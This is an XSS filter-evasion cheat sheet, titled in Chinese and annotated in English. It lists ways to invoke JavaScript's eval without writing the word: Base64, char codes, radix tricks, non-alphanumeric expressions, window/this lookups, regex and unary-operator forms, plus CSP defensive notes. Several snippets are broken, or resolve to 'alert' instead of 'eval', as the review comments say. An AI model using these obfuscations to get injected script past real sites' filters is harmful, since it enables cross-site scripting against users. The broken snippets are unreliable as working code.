xss 之 无需 eval (收集不同方法来执行字符串,无需显式调用eval()函数)
/***********************/
/* Encoded eval string */
/***********************/
<script>
/*
 * Five string literals, each holding an encoded or computed spelling of a
 * global function name. This block only assigns them; nothing is decoded or
 * called here. None of the literals contains the plain text "eval", so a
 * filter that matches on that word does not see them.
 */
/* Base64 text: atob('ZXZhbA==') yields "eval". */
var eval_b64 = 'ZXZhbA==';
/* Source text of a call that builds "eval" from the char codes 101,118,97,108. */
var eval_charcode = 'String.fromCharCode(101,118,97,108)';
/* Radix-32 number formatting (1<<5 is 32), not Base32 encoding: 490837 written in base 32 reads "eval". */
var eval_base32 = '490837..toString(1<<5)';
/*
 * NOTE(review): despite the variable name, this expression does not spell
 * "eval". It indexes the coerced strings "NaN"[1], "false"[2], "undefined"[3],
 * "true"[1], "true"[0], which concatenate to "alert".
 */
var eval_non_alpha1 = '(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]';
/*
 * Same five lookups with the indices written as -~[] (1), -~-~[] (2) and
 * -~-~-~[] (3), so it also yields "alert".
 * NOTE(review): the literal ends with an unmatched closing parenthesis, so the
 * text inside it is not a valid expression as written.
 */
var eval_non_alpha2 = '(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]])';
</script>
/*********************/
/* Through functions */
/*********************/
<script>
/*
 * Reads a property of window under a name computed at run time
 * (atob('ZXZhbA==') is "eval") and stores the reference in fn, so the
 * identifier eval never appears in the source text.
 * NOTE(review): the argument placeholder in the fn call is a comment that is
 * never closed (it ends with a second opener rather than a closer), so as
 * written the comment runs to the end of the script and the snippet does not
 * parse. The same applies to the two scripts that follow.
 * Defensive note: a Content-Security-Policy whose script-src omits
 * 'unsafe-eval' refuses string evaluation regardless of how the reference to
 * the function was obtained.
 */
var fn=window[atob('ZXZhbA==')];
fn(/*code to eval()/*);
</script>
<script>
/* Same lookup; the property name "eval" is built from char codes 101,118,97,108. */
var fn=window[String.fromCharCode(101,118,97,108)];
fn(/*code to eval()/*);
</script>
<script>
/* Same lookup; 490837 formatted in radix 32 (1<<5) reads "eval". */
var fn=window[490837..toString(1<<5)];
fn(/*code to eval()/*);
</script>
/**********************************/
/* Straight through window object */
/**********************************/
<script>
/*
 * Calls a window property directly, with the property name computed inline
 * instead of being stored in a variable first. The argument is only a comment
 * placeholder, so as written each call passes no arguments.
 * Here the name comes from atob('ZXZhbA=='), which is "eval".
 * Defensive note: matching on the word "eval" in markup or script text does
 * not catch these forms. A Content-Security-Policy whose script-src omits
 * 'unsafe-eval' blocks the string evaluation itself, and one that also omits
 * 'unsafe-inline' keeps an injected inline script from running at all.
 */
window[atob('ZXZhbA==')](/*code to eval()*/)
</script>
<script>
/* Property name "eval" built from char codes 101,118,97,108. */
window[String.fromCharCode(101,118,97,108)](/*code to eval()*/)
</script>
<script>
/* Property name "eval" produced by formatting 490837 in radix 32 (1<<5). */
window[490837..toString(1<<5)](/*code to eval()*/)
</script>
<script>
/*
 * NOTE(review): this index expression evaluates to "alert", not "eval":
 * "NaN"[1] + "false"[2] + "undefined"[3] + "true"[1] + "true"[0].
 * The line therefore calls window.alert, which does not evaluate a string.
 */
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
<script>
/* Same as the previous script with the indices 1, 2, 3 written as -~[], -~-~[], -~-~-~[]; also resolves to "alert". */
window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
/*************************/
/* Straight through this */
/*************************/
<script>
/*
 * Same computed-name lookups as the window section, made on `this` instead.
 * At the top level of a classic (non-module) script `this` is the global
 * object, so neither "window" nor "eval" appears in the text. In a module
 * script top-level `this` is undefined and the lookup throws.
 * The argument is only a comment placeholder, so as written each call passes
 * no arguments.
 * Here the name comes from atob('ZXZhbA=='), which is "eval".
 */
this[atob('ZXZhbA==')](/*code to eval()*/)
</script>
<script>
/* Property name "eval" built from char codes 101,118,97,108. */
this[String.fromCharCode(101,118,97,108)](/*code to eval()*/)
</script>
<script>
/* Property name "eval" produced by formatting 490837 in radix 32 (1<<5). */
this[490837..toString(1<<5)](/*code to eval()*/)
</script>
<script>
/*
 * NOTE(review): this index expression evaluates to "alert", not "eval":
 * "NaN"[1] + "false"[2] + "undefined"[3] + "true"[1] + "true"[0].
 */
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
<script>
/* Same as the previous script with the indices 1, 2, 3 written as -~[], -~-~[], -~-~-~[]; also resolves to "alert". */
this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
/****************/
/* regexp based */
/****************/
<script>
/*
 * The pattern captures every other character of 'e1v2a3l' (e, v, a, l) and
 * skips the digits between them. The callback concatenates the four captures
 * into "eval" and uses the result as a property name on `this`.
 * The callback is an ordinary function, so `this` is the global object only
 * in non-strict code; in strict mode it is undefined and the lookup throws.
 * The callback returns nothing and the string returned by replace() is
 * discarded; only the side effect of the call matters here.
 */
'e1v2a3l'.replace(/(.).(.).(.).(.)/, function(match,$1,$2,$3,$4) { this[$1+$2+$3+$4](/* code to eval() */); })
</script>
/*********************************/
/* Other ways to execute strings */
/*********************************/
<script>
/*
 * Templates, not runnable code: each comment placeholder marks where an
 * expression would go, and with the placeholders left as comments the lines
 * do not parse. They show an expression being evaluated as the operand of a
 * unary operator or of throw, rather than as a statement that begins with a
 * recognisable function call.
 */
/* Operand of delete. */
delete /* code to execute */
/* Operand of a chain of unary operators (~, delete, typeof) under throw. */
throw~delete~typeof~/* code to execute */
/* Assigns a function to `a` inside an array literal, then calls a(...) on the right-hand side of a division. */
delete[a=/* function */]/delete a(/* params */)
/*
 * NOTE(review): lowercase `function` is the function-expression keyword and
 * has no body here; presumably the Function constructor (capital F) was
 * meant. Confirm against the original source of this list.
 * Defensive note: a Content-Security-Policy whose script-src omits
 * 'unsafe-eval' blocks the Function constructor along with eval.
 */
var a = (new function(/* code to execute */))();
</script>